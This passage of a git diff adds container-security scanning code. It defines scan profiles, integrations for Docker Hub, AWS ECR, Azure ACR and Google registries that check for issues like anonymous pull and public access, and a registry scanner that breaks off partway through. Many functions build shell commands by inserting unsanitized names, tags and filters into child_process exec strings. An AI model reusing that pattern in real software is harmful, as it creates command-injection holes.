+      enabled: false,
+      scanPods: false,
+      scanRBAC: false,
+      scanNetworkPolicies: false,
+      scanSecrets: false,
+      scanAdmission: false,
+    },
+    compliance: {
+      enabled: false,
+      frameworks: [],
+    },
+    externalTools: ["trivy"],
+    timeout: 120000,
+  }
+
+  /**
+   * Standard profile - balanced security scan
+   */
+  export const Standard: ContainerScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Balanced scan with vulnerability detection, runtime analysis, and basic Kubernetes checks",
+    image: {
+      enabled: true,
+      scanVulnerabilities: true,
+      generateSBOM: false,
+      scanSecrets: true,
+      severityThreshold: "medium",
+      ignoreUnfixed: false,
+    },
+    runtime: {
+      enabled: true,
+      checkPrivileged: true,
+      checkRootUser: true,
+      checkCapabilities: true,
+      checkMounts: true,
+      checkNetworking: true,
+      checkDaemon: false,
+    },
+    kubernetes: {
+      enabled: true,
+      scanPods: true,
+      scanRBAC: false,
+      scanNetworkPolicies: false,
+      scanSecrets: false,
+      scanAdmission: false,
+    },
+    compliance: {
+      enabled: true,
+      frameworks: ["cis-docker"],
+    },
+    externalTools: ["trivy", "grype"],
+    timeout: 300000,
+  }
+
+  /**
+   * Thorough profile - comprehensive security scan
+   */
+  export const Thorough: ContainerScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive scan with all checks, SBOM generation, and full Kubernetes analysis",
+    image: {
+      enabled: true,
+      scanVulnerabilities: true,
+      generateSBOM: true,
+      scanSecrets: true,
+      severityThreshold: "low",
+      ignoreUnfixed: false,
+    },
+    runtime: {
+      enabled: true,
+      checkPrivileged: true,
+      checkRootUser: true,
+      checkCapabilities: true,
+      checkMounts: true,
+      checkNetworking: true,
+      checkDaemon: true,
+    },
+    kubernetes: {
+      enabled: true,
+      scanPods: true,
+      scanRBAC: true,
+      scanNetworkPolicies: true,
+      scanSecrets: true,
+      scanAdmission: true,
+    },
+    compliance: {
+      enabled: true,
+      frameworks: ["cis-docker", "cis-kubernetes"],
+    },
+    externalTools: ["trivy", "grype", "syft", "kubeaudit"],
+    timeout: 600000,
+  }
+
+  /**
+   * Compliance profile - focus on compliance frameworks
+   */
+  export const Compliance: ContainerScanTypes.ScanProfile = {
+    id: "compliance",
+    name: "Compliance",
+    description: "Focus on compliance framework checks for Docker and Kubernetes",
+    image: {
+      enabled: true,
+      scanVulnerabilities: false,
+      generateSBOM: false,
+      scanSecrets: false,
+      severityThreshold: "low",
+      ignoreUnfixed: false,
+    },
+    runtime: {
+      enabled: true,
+      checkPrivileged: true,
+      checkRootUser: true,
+      checkCapabilities: true,
+      checkMounts: true,
+      checkNetworking: true,
+      checkDaemon: true,
+    },
+    kubernetes: {
+      enabled: true,
+      scanPods: true,
+      scanRBAC: true,
+      scanNetworkPolicies: true,
+      scanSecrets: true,
+      scanAdmission: true,
+    },
+    compliance: {
+      enabled: true,
+      frameworks: ["cis-docker", "cis-kubernetes", "nsa-cisa"],
+    },
+    externalTools: ["kubeaudit"],
+    timeout: 300000,
+  }
+
+  /**
+   * SBOM-only profile - generate SBOMs without vulnerability scanning
+   */
+  export const SBOMOnly: ContainerScanTypes.ScanProfile = {
+    id: "sbom-only",
+    name: "SBOM Only",
+    description: "Generate Software Bill of Materials (SBOM) for images without vulnerability scanning",
+    image: {
+      enabled: true,
+      scanVulnerabilities: false,
+      generateSBOM: true,
+      scanSecrets: false,
+      severityThreshold: "low",
+      ignoreUnfixed: false,
+    },
+    runtime: {
+      enabled: false,
+      checkPrivileged: false,
+      checkRootUser: false,
+      checkCapabilities: false,
+      checkMounts: false,
+      checkNetworking: false,
+      checkDaemon: false,
+    },
+    kubernetes: {
+      enabled: false,
+      scanPods: false,
+      scanRBAC: false,
+      scanNetworkPolicies: false,
+      scanSecrets: false,
+      scanAdmission: false,
+    },
+    compliance: {
+      enabled: false,
+      frameworks: [],
+    },
+    externalTools: ["syft"],
+    timeout: 120000,
+  }
+
+  /**
+   * Get a profile by ID
+   */
+  export function get(id: ContainerScanTypes.ProfileId): ContainerScanTypes.ScanProfile {
+    switch (id) {
+      case "discovery":
+        return Discovery
+      case "quick":
+        return Quick
+      case "standard":
+        return Standard
+      case "thorough":
+        return Thorough
+      case "compliance":
+        return Compliance
+      case "sbom-only":
+        return SBOMOnly
+      default:
+        return Standard
+    }
+  }
+
+  /**
+   * List all profiles
+   */
+  export function list(): ContainerScanTypes.ScanProfile[] {
+    return [Discovery, Quick, Standard, Thorough, Compliance, SBOMOnly]
+  }
+
+  /**
+   * Create a custom profile from a base
+   */
+  export function createCustom(
+    baseId: ContainerScanTypes.ProfileId,
+    overrides: Partial<ContainerScanTypes.ScanProfile>
+  ): ContainerScanTypes.ScanProfile {
+    const base = get(baseId)
+    return {
+      ...base,
+      ...overrides,
+      id: "standard", // Custom profiles use standard ID
+      image: { ...base.image, ...overrides.image },
+      runtime: { ...base.runtime, ...overrides.runtime },
+      kubernetes: { ...base.kubernetes, ...overrides.kubernetes },
+      compliance: { ...base.compliance, ...overrides.compliance },
+    }
+  }
+
+  /**
+   * Get profile description for display
+   */
+  export function describe(profile: ContainerScanTypes.ScanProfile): string {
+    const features: string[] = []
+
+    if (profile.image.scanVulnerabilities) features.push("Vulnerability scanning")
+    if (profile.image.generateSBOM) features.push("SBOM generation")
+    if (profile.image.scanSecrets) features.push("Secret detection")
+    if (profile.runtime.enabled) features.push("Runtime analysis")
+    if (profile.kubernetes.enabled) features.push("Kubernetes scanning")
+    if (profile.compliance.enabled) features.push(`Compliance (${profile.compliance.frameworks.join(", ")})`)
+
+    return `${profile.name}: ${profile.description}\nFeatures: ${features.join(", ")}\nTools: ${profile.externalTools.join(", ") || "None"}`
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/registry/acr.ts b/packages/opencode/src/pentest/containerscan/registry/acr.ts
new file mode 100644
index 00000000000..75e7e44f944
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/acr.ts
@@ -0,0 +1,222 @@
+/**
+ * @fileoverview Azure ACR Integration
+ *
+ * Azure Container Registry operations.
+ *
+ * @module pentest/containerscan/registry/acr
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.registry.acr" })
+
+/**
+ * Azure ACR namespace
+ */
+export namespace AzureACR {
+  /**
+   * List ACR registries in subscription
+   */
+  export async function listRegistries(): Promise<
+    { name: string; loginServer: string; location: string }[]
+  > {
+    try {
+      const { stdout } = await execAsync("az acr list --output json")
+      const data = JSON.parse(stdout)
+
+      return (data || []).map((reg: Record<string, unknown>) => ({
+        name: reg.name as string,
+        loginServer: reg.loginServer as string,
+        location: reg.location as string,
+      }))
+    } catch (error) {
+      log.error("ACR list registries failed", { error })
+      return []
+    }
+  }
+
+  /**
+   * List repositories in a registry
+   */
+  export async function listRepositories(registryName: string): Promise<string[]> {
+    try {
+      const { stdout } = await execAsync(`az acr repository list --name ${registryName} --output json`)
+      return JSON.parse(stdout) || []
+    } catch (error) {
+      log.error("ACR list repositories failed", { registryName, error })
+      return []
+    }
+  }
+
+  /**
+   * List tags for a repository
+   */
+  export async function listTags(
+    registryName: string,
+    repository: string
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    try {
+      const { stdout } = await execAsync(
+        `az acr repository show-tags --name ${registryName} --repository ${repository} --output json`
+      )
+      const tags = JSON.parse(stdout) || []
+
+      return tags.map((tag: string) => ({
+        registry: `${registryName}.azurecr.io`,
+        repository,
+        tag,
+      }))
+    } catch (error) {
+      log.error("ACR list tags failed", { registryName, repository, error })
+      return []
+    }
+  }
+
+  /**
+   * Get manifest for an image
+   */
+  export async function getManifest(
+    registryName: string,
+    repository: string,
+    tag: string
+  ): Promise<{ digest: string; config: Record<string, unknown> } | undefined> {
+    try {
+      const { stdout } = await execAsync(
+        `az acr repository show-manifests --name ${registryName} --repository ${repository} --query "[?tags[?contains(@,'${tag}')]]" --output json`
+      )
+      const manifests = JSON.parse(stdout) || []
+
+      if (manifests.length > 0) {
+        return {
+          digest: manifests[0].digest,
+          config: manifests[0],
+        }
+      }
+
+      return undefined
+    } catch (error) {
+      log.error("ACR get manifest failed", { registryName, repository, tag, error })
+      return undefined
+    }
+  }
+
+  /**
+   * Login to ACR
+   */
+  export async function login(registryName: string): Promise<boolean> {
+    try {
+      await execAsync(`az acr login --name ${registryName}`)
+      return true
+    } catch (error) {
+      log.error("ACR login failed", { registryName, error })
+      return false
+    }
+  }
+
+  /**
+   * Run ACR task (for building/scanning)
+   */
+  export async function runTask(
+    registryName: string,
+    taskName: string
+  ): Promise<{ status: string; logs: string }> {
+    try {
+      const { stdout, stderr } = await execAsync(`az acr task run --name ${taskName} --registry ${registryName}`)
+      return {
+        status: "success",
+        logs: stdout + stderr,
+      }
+    } catch (error) {
+      return {
+        status: "failed",
+        logs: error instanceof Error ? error.message : String(error),
+      }
+    }
+  }
+
+  /**
+   * Check if ACR is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    try {
+      await execAsync("az acr list --output none")
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Create registry config for ACR
+   */
+  export function createRegistry(registryName: string): ContainerScanTypes.Registry {
+    return {
+      type: "acr",
+      url: `${registryName}.azurecr.io`,
+      name: `ACR (${registryName})`,
+      authenticated: false,
+    }
+  }
+
+  /**
+   * Check ACR security configuration
+   */
+  export async function checkSecurity(registryName: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      const { stdout } = await execAsync(`az acr show --name ${registryName} --output json`)
+      const registry = JSON.parse(stdout)
+
+      // Check admin user enabled
+      if (registry.adminUserEnabled) {
+        findings.push({
+          id: `acr-admin-${Date.now()}`,
+          category: "misconfiguration",
+          severity: "medium",
+          title: "ACR Admin User Enabled",
+          description: `Registry ${registryName} has admin user enabled. This allows full access with a single password.`,
+          resource: { type: "registry", name: registryName },
+          remediation: "Disable admin user and use service principals or managed identity",
+          detectedAt: Date.now(),
+        })
+      }
+
+      // Check public network access
+      if (registry.publicNetworkAccess === "Enabled") {
+        findings.push({
+          id: `acr-public-${Date.now()}`,
+          category: "misconfiguration",
+          severity: "medium",
+          title: "ACR Public Network Access Enabled",
+          description: `Registry ${registryName} is accessible from public networks.`,
+          resource: { type: "registry", name: registryName },
+          remediation: "Consider restricting access with firewall rules or private endpoints",
+          detectedAt: Date.now(),
+        })
+      }
+
+      // Check anonymous pull
+      if (registry.anonymousPullEnabled) {
+        findings.push({
+          id: `acr-anon-${Date.now()}`,
+          category: "misconfiguration",
+          severity: "high",
+          title: "ACR Anonymous Pull Enabled",
+          description: `Registry ${registryName} allows anonymous pull. Anyone can pull images.`,
+          resource: { type: "registry", name: registryName },
+          remediation: "Disable anonymous pull unless specifically required for public images",
+          detectedAt: Date.now(),
+        })
+      }
+    } catch (error) {
+      log.error("ACR security check failed", { registryName, error })
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/registry/dockerhub.ts b/packages/opencode/src/pentest/containerscan/registry/dockerhub.ts
new file mode 100644
index 00000000000..42d01e8ef61
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/dockerhub.ts
@@ -0,0 +1,139 @@
+/**
+ * @fileoverview Docker Hub Integration
+ *
+ * Docker Hub registry operations.
+ *
+ * @module pentest/containerscan/registry/dockerhub
+ */
+
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const log = Log.create({ service: "pentest.containerscan.registry.dockerhub" })
+
+const DOCKERHUB_API = "https://hub.docker.com/v2"
+
+/**
+ * Docker Hub namespace
+ */
+export namespace DockerHub {
+  /**
+   * Search for repositories
+   */
+  export async function searchRepositories(
+    query: string,
+    options: { limit?: number; official?: boolean } = {}
+  ): Promise<{ name: string; description: string; stars: number; official: boolean }[]> {
+    try {
+      const params = new URLSearchParams({
+        query,
+        page_size: String(options.limit || 25),
+      })
+
+      if (options.official) {
+        params.set("is_official", "true")
+      }
+
+      const response = await fetch(`${DOCKERHUB_API}/search/repositories?${params}`, {
+        headers: { Accept: "application/json" },
+      })
+
+      if (!response.ok) {
+        throw new Error(`Docker Hub API error: ${response.status}`)
+      }
+
+      const data = await response.json()
+      return (data.results || []).map((r: Record<string, unknown>) => ({
+        name: r.repo_name || r.name,
+        description: r.short_description || "",
+        stars: r.star_count || 0,
+        official: r.is_official || false,
+      }))
+    } catch (error) {
+      log.error("Docker Hub search failed", { query, error })
+      return []
+    }
+  }
+
+  /**
+   * List tags for a repository
+   */
+  export async function listTags(
+    repository: string,
+    options: { limit?: number } = {}
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    try {
+      const repo = repository.includes("/") ? repository : `library/${repository}`
+      const url = `${DOCKERHUB_API}/repositories/${repo}/tags?page_size=${options.limit || 100}`
+
+      const response = await fetch(url, {
+        headers: { Accept: "application/json" },
+      })
+
+      if (!response.ok) {
+        throw new Error(`Docker Hub API error: ${response.status}`)
+      }
+
+      const data = await response.json()
+      return (data.results || []).map((tag: Record<string, unknown>) => ({
+        registry: "docker.io",
+        repository,
+        tag: tag.name as string,
+        digest: tag.digest as string,
+        size: tag.full_size as number,
+        pushedAt: tag.last_updated as string,
+      }))
+    } catch (error) {
+      log.error("Docker Hub list tags failed", { repository, error })
+      return []
+    }
+  }
+
+  /**
+   * Get repository info
+   */
+  export async function getRepository(repository: string): Promise<{
+    name: string
+    namespace: string
+    description: string
+    stars: number
+    pulls: number
+    lastUpdated: string
+  } | undefined> {
+    try {
+      const repo = repository.includes("/") ? repository : `library/${repository}`
+      const response = await fetch(`${DOCKERHUB_API}/repositories/${repo}`, {
+        headers: { Accept: "application/json" },
+      })
+
+      if (!response.ok) {
+        return undefined
+      }
+
+      const data = await response.json()
+      return {
+        name: data.name,
+        namespace: data.namespace,
+        description: data.description || "",
+        stars: data.star_count || 0,
+        pulls: data.pull_count || 0,
+        lastUpdated: data.last_updated,
+      }
+    } catch (error) {
+      log.error("Docker Hub get repository failed", { repository, error })
+      return undefined
+    }
+  }
+
+  /**
+   * Create registry config for Docker Hub
+   */
+  export function createRegistry(): ContainerScanTypes.Registry {
+    return {
+      type: "dockerhub",
+      url: "docker.io",
+      name: "Docker Hub",
+      authenticated: false,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/registry/ecr.ts b/packages/opencode/src/pentest/containerscan/registry/ecr.ts
new file mode 100644
index 00000000000..fb43554f648
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/ecr.ts
@@ -0,0 +1,184 @@
+/**
+ * @fileoverview AWS ECR Integration
+ *
+ * AWS Elastic Container Registry operations.
+ *
+ * @module pentest/containerscan/registry/ecr
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.registry.ecr" })
+
+/**
+ * AWS ECR namespace
+ */
+export namespace AWSECR {
+  /**
+   * List ECR repositories
+   */
+  export async function listRepositories(region?: string): Promise<
+    { name: string; uri: string; createdAt: string }[]
+  > {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      const { stdout } = await execAsync(`aws ecr describe-repositories ${regionArg} --output json`)
+      const data = JSON.parse(stdout)
+
+      return (data.repositories || []).map((repo: Record<string, unknown>) => ({
+        name: repo.repositoryName as string,
+        uri: repo.repositoryUri as string,
+        createdAt: repo.createdAt as string,
+      }))
+    } catch (error) {
+      log.error("ECR list repositories failed", { region, error })
+      return []
+    }
+  }
+
+  /**
+   * List images in a repository
+   */
+  export async function listImages(
+    repository: string,
+    region?: string
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      const { stdout } = await execAsync(
+        `aws ecr describe-images --repository-name ${repository} ${regionArg} --output json`
+      )
+      const data = JSON.parse(stdout)
+
+      const images: ContainerScanTypes.RegistryImage[] = []
+      for (const image of data.imageDetails || []) {
+        for (const tag of image.imageTags || ["untagged"]) {
+          images.push({
+            registry: `${data.registryId || ""}.dkr.ecr.${region || "us-east-1"}.amazonaws.com`,
+            repository,
+            tag,
+            digest: image.imageDigest,
+            size: image.imageSizeInBytes,
+            pushedAt: image.imagePushedAt,
+          })
+        }
+      }
+
+      return images
+    } catch (error) {
+      log.error("ECR list images failed", { repository, region, error })
+      return []
+    }
+  }
+
+  /**
+   * Get ECR login token
+   */
+  export async function getLoginToken(region?: string): Promise<string | undefined> {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      const { stdout } = await execAsync(`aws ecr get-login-password ${regionArg}`)
+      return stdout.trim()
+    } catch (error) {
+      log.error("ECR get login token failed", { region, error })
+      return undefined
+    }
+  }
+
+  /**
+   * Login to ECR
+   */
+  export async function login(registryUrl: string, region?: string): Promise<boolean> {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      await execAsync(
+        `aws ecr get-login-password ${regionArg} | docker login --username AWS --password-stdin ${registryUrl}`
+      )
+      return true
+    } catch (error) {
+      log.error("ECR login failed", { registryUrl, region, error })
+      return false
+    }
+  }
+
+  /**
+   * Get image scan findings (ECR native scanning)
+   */
+  export async function getImageScanFindings(
+    repository: string,
+    imageDigest: string,
+    region?: string
+  ): Promise<{
+    status: string
+    findings: { severity: string; name: string; uri: string }[]
+  }> {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      const { stdout } = await execAsync(
+        `aws ecr describe-image-scan-findings --repository-name ${repository} --image-id imageDigest=${imageDigest} ${regionArg} --output json`
+      )
+      const data = JSON.parse(stdout)
+
+      return {
+        status: data.imageScanStatus?.status || "UNKNOWN",
+        findings: (data.imageScanFindings?.findings || []).map((f: Record<string, unknown>) => ({
+          severity: f.severity as string,
+          name: f.name as string,
+          uri: f.uri as string,
+        })),
+      }
+    } catch (error) {
+      log.error("ECR get scan findings failed", { repository, imageDigest, region, error })
+      return { status: "ERROR", findings: [] }
+    }
+  }
+
+  /**
+   * Start image scan (ECR native scanning)
+   */
+  export async function startImageScan(
+    repository: string,
+    imageTag: string,
+    region?: string
+  ): Promise<boolean> {
+    try {
+      const regionArg = region ? `--region ${region}` : ""
+      await execAsync(
+        `aws ecr start-image-scan --repository-name ${repository} --image-id imageTag=${imageTag} ${regionArg}`
+      )
+      return true
+    } catch (error) {
+      log.error("ECR start image scan failed", { repository, imageTag, region, error })
+      return false
+    }
+  }
+
+  /**
+   * Check if ECR is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    try {
+      await execAsync("aws ecr describe-repositories --max-items 1")
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Create registry config for ECR
+   */
+  export function createRegistry(accountId: string, region: string): ContainerScanTypes.Registry {
+    return {
+      type: "ecr",
+      url: `${accountId}.dkr.ecr.${region}.amazonaws.com`,
+      name: `ECR (${region})`,
+      authenticated: false,
+      region,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/registry/gcr.ts b/packages/opencode/src/pentest/containerscan/registry/gcr.ts
new file mode 100644
index 00000000000..1bab8094427
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/gcr.ts
@@ -0,0 +1,254 @@
+/**
+ * @fileoverview Google GCR/Artifact Registry Integration
+ *
+ * Google Container Registry and Artifact Registry operations.
+ *
+ * @module pentest/containerscan/registry/gcr
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.registry.gcr" })
+
+/**
+ * Google GCR namespace
+ */
+export namespace GoogleGCR {
+  /**
+   * List Artifact Registry repositories
+   */
+  export async function listRepositories(
+    project: string,
+    location?: string
+  ): Promise<{ name: string; format: string; location: string }[]> {
+    try {
+      const locationArg = location ? `--location=${location}` : ""
+      const { stdout } = await execAsync(
+        `gcloud artifacts repositories list --project=${project} ${locationArg} --format=json`
+      )
+      const data = JSON.parse(stdout)
+
+      return (data || []).map((repo: Record<string, unknown>) => ({
+        name: (repo.name as string).split("/").pop() || "",
+        format: repo.format as string,
+        location: (repo.name as string).split("/")[3] || "",
+      }))
+    } catch (error) {
+      log.error("GCR list repositories failed", { project, error })
+      return []
+    }
+  }
+
+  /**
+   * List images in GCR repository
+   */
+  export async function listImages(
+    project: string,
+    repository?: string
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    try {
+      const repo = repository ? `${project}/${repository}` : project
+      const { stdout } = await execAsync(`gcloud container images list --repository=gcr.io/${repo} --format=json`)
+      const data = JSON.parse(stdout)
+
+      const images: ContainerScanTypes.RegistryImage[] = []
+      for (const image of data || []) {
+        const imageName = (image.name as string).replace("gcr.io/", "")
+        // Get tags for each image
+        const tags = await listTags(project, imageName.replace(`${project}/`, ""))
+        images.push(...tags)
+      }
+
+      return images
+    } catch (error) {
+      log.error("GCR list images failed", { project, error })
+      return []
+    }
+  }
+
+  /**
+   * List tags for an image
+   */
+  export async function listTags(
+    project: string,
+    image: string
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    try {
+      const fullImage = `gcr.io/${project}/${image}`
+      const { stdout } = await execAsync(`gcloud container images list-tags ${fullImage} --format=json`)
+      const data = JSON.parse(stdout)
+
+      const images: ContainerScanTypes.RegistryImage[] = []
+      for (const item of data || []) {
+        for (const tag of item.tags || []) {
+          images.push({
+            registry: "gcr.io",
+            repository: `${project}/${image}`,
+            tag,
+            digest: item.digest,
+            pushedAt: item.timestamp?.datetime,
+          })
+        }
+      }
+
+      return images
+    } catch (error) {
+      log.error("GCR list tags failed", { project, image, error })
+      return []
+    }
+  }
+
+  /**
+   * Configure Docker for GCR
+   */
+  export async function configureDocker(): Promise<boolean> {
+    try {
+      await execAsync("gcloud auth configure-docker --quiet")
+      return true
+    } catch (error) {
+      log.error("GCR configure docker failed", { error })
+      return false
+    }
+  }
+
+  /**
+   * Configure Docker for Artifact Registry
+   */
+  export async function configureArtifactRegistry(location: string): Promise<boolean> {
+    try {
+      await execAsync(`gcloud auth configure-docker ${location}-docker.pkg.dev --quiet`)
+      return true
+    } catch (error) {
+      log.error("Artifact Registry configure docker failed", { location, error })
+      return false
+    }
+  }
+
+  /**
+   * Get vulnerability occurrences (Container Analysis API)
+   */
+  export async function getVulnerabilities(
+    project: string,
+    resourceUrl: string
+  ): Promise<{ severity: string; cveId: string; packageIssue: string }[]> {
+    try {
+      const { stdout } = await execAsync(
+        `gcloud artifacts vulnerabilities list --project=${project} --filter="resourceUri='${resourceUrl}'" --format=json`
+      )
+      const data = JSON.parse(stdout)
+
+      return (data || []).map((vuln: Record<string, unknown>) => {
+        const vulnerability = vuln.vulnerability as Record<string, unknown>
+        return {
+          severity: vulnerability?.effectiveSeverity as string || "UNKNOWN",
+          cveId: (vulnerability?.shortDescription as string) || "",
+          packageIssue: JSON.stringify(vulnerability?.packageIssue),
+        }
+      })
+    } catch (error) {
+      log.error("GCR get vulnerabilities failed", { project, resourceUrl, error })
+      return []
+    }
+  }
+
+  /**
+   * Check if GCR/gcloud is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    try {
+      await execAsync("gcloud --version")
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Get current project
+   */
+  export async function getCurrentProject(): Promise<string | undefined> {
+    try {
+      const { stdout } = await execAsync("gcloud config get-value project")
+      return stdout.trim() || undefined
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * Create registry config for GCR
+   */
+  export function createGCRRegistry(project: string): ContainerScanTypes.Registry {
+    return {
+      type: "gcr",
+      url: "gcr.io",
+      name: `GCR (${project})`,
+      authenticated: false,
+      project,
+    }
+  }
+
+  /**
+   * Create registry config for Artifact Registry
+   */
+  export function createArtifactRegistry(project: string, location: string): ContainerScanTypes.Registry {
+    return {
+      type: "gcr",
+      url: `${location}-docker.pkg.dev`,
+      name: `Artifact Registry (${project}/${location})`,
+      authenticated: false,
+      project,
+      region: location,
+    }
+  }
+
+  /**
+   * Check GCR security configuration
+   */
+  export async function checkSecurity(project: string): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      // Check for public images
+      const { stdout } = await execAsync(
+        `gcloud container images list --repository=gcr.io/${project} --format=json`
+      )
+      const images = JSON.parse(stdout) || []
+
+      for (const image of images) {
+        // Check IAM bindings for public access
+        try {
+          const { stdout: iamOut } = await execAsync(
+            `gcloud container images get-iam-policy ${image.name} --format=json`
+          )
+          const policy = JSON.parse(iamOut)
+
+          for (const binding of policy.bindings || []) {
+            if (binding.members?.includes("allUsers") || binding.members?.includes("allAuthenticatedUsers")) {
+              findings.push({
+                id: `gcr-public-${Date.now()}`,
+                category: "misconfiguration",
+                severity: "high",
+                title: "Public GCR Image",
+                description: `Image ${image.name} is publicly accessible.`,
+                resource: { type: "registry", name: image.name },
+                remediation: "Remove public access from the image IAM policy",
+                detectedAt: Date.now(),
+              })
+            }
+          }
+        } catch {
+          // IAM check might fail for individual images
+        }
+      }
+    } catch (error) {
+      log.error("GCR security check failed", { project, error })
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/registry/index.ts b/packages/opencode/src/pentest/containerscan/registry/index.ts
new file mode 100644
index 00000000000..f8ecfcc0cc3
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Registry Module
+ *
+ * Exports for container registry operations.
+ *
+ * @module pentest/containerscan/registry
+ */
+
+export { RegistryScanner } from "./scanner"
+export { DockerHub } from "./dockerhub"
+export { AWSECR } from "./ecr"
+export { AzureACR } from "./acr"
+export { GoogleGCR } from "./gcr"
diff --git a/packages/opencode/src/pentest/containerscan/registry/scanner.ts b/packages/opencode/src/pentest/containerscan/registry/scanner.ts
new file mode 100644
index 00000000000..155f04581c4
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/registry/scanner.ts
@@ -0,0 +1,422 @@
+/**
+ * @fileoverview Registry Scanner
+ *
+ * Scans container images in registries.
+ *
+ * @module pentest/containerscan/registry/scanner
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+import { DockerImages } from "../docker/images"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.registry.scanner" })
+
+/**
+ * Registry Scanner namespace
+ */
+export namespace RegistryScanner {
+  /**
+   * Scan images in a registry
+   */
+  export async function scanRegistry(
+    registry: ContainerScanTypes.Registry,
+    scanId: string,
+    options: {
+      repository?: string
+      tags?: string[]
+      limit?: number
+      severities?: ContainerScanTypes.Severity[]
+      generateSBOM?: boolean
+      timeout?: number
+    } = {}
+  ): Promise<{
+    images: ContainerScanTypes.ImageScanResult[]
+    findings: ContainerScanTypes.ContainerFinding[]
+    stats: {
+      imagesScanned: number
+      totalVulnerabilities: number
+      criticalCount: number
+      highCount: number
+    }
+  }> {
+    const results: ContainerScanTypes.ImageScanResult[] = []
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+    const limit = options.limit || 10
+
+    try {
+      // List images from registry
+      const images = await listImages(registry, options)
+
+      // Limit the number of images to scan
+      const imagesToScan = images.slice(0, limit)
+
+      log.info("Scanning registry images", {
+        registry: registry.url,
+        total: images.length,
+        scanning: imagesToScan.length,
+      })
+
+      // Scan each image
+      for (const image of imagesToScan) {
+        try {
+          const imageRef = formatImageRef(registry, image)
+
+          // Emit discovery event
+          Bus.publish(ContainerScanEvents.RegistryImageFound, {
+            scanId,
+            registry: registry.url,
+            repository: image.repository,
+            tag: image.tag,
+            digest: image.digest,
+          })
+
+          // Pull and scan
+          const { result } = await DockerImages.scanComprehensive(imageRef, scanId, {
+            severities: options.severities,
+            generateSBOM: options.generateSBOM,
+            timeout: options.timeout,
+          })
+
+          results.push(result)
+
+          // Generate findings for critical/high vulnerabilities
+          for (const vuln of result.vulnerabilities) {
+            if (vuln.severity === "critical" || vuln.severity === "high") {
+              findings.push(createVulnFinding(imageRef, vuln))
+            }
+          }
+        } catch (error) {
+          log.warn("Failed to scan registry image", {
+            image: image.repository,
+            tag: image.tag,
+            error: error instanceof Error ? error.message : String(error),
+          })
+        }
+      }
+
+      // Calculate stats
+      const stats = {
+        imagesScanned: results.length,
+        totalVulnerabilities: results.reduce((acc, r) => acc + r.stats.total, 0),
+        criticalCount: results.reduce((acc, r) => acc + r.stats.critical, 0),
+        highCount: results.reduce((acc, r) => acc + r.stats.high, 0),
+      }
+
+      log.info("Registry scan complete", stats)
+
+      return { images: results, findings, stats }
+    } catch (error) {
+      log.error("Registry scan failed", { registry: registry.url, error })
+      throw error
+    }
+  }
+
+  /**
+   * List images in a registry
+   */
+  export async function listImages(
+    registry: ContainerScanTypes.Registry,
+    options: {
+      repository?: string
+      tags?: string[]
+    } = {}
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    switch (registry.type) {
+      case "dockerhub":
+        return listDockerHubImages(registry, options)
+      case "ecr":
+        return listECRImages(registry, options)
+      case "acr":
+        return listACRImages(registry, options)
+      case "gcr":
+        return listGCRImages(registry, options)
+      case "ghcr":
+        return listGHCRImages(registry, options)
+      default:
+        return listGenericImages(registry, options)
+    }
+  }
+
+  /**
+   * List Docker Hub images
+   */
+  async function listDockerHubImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
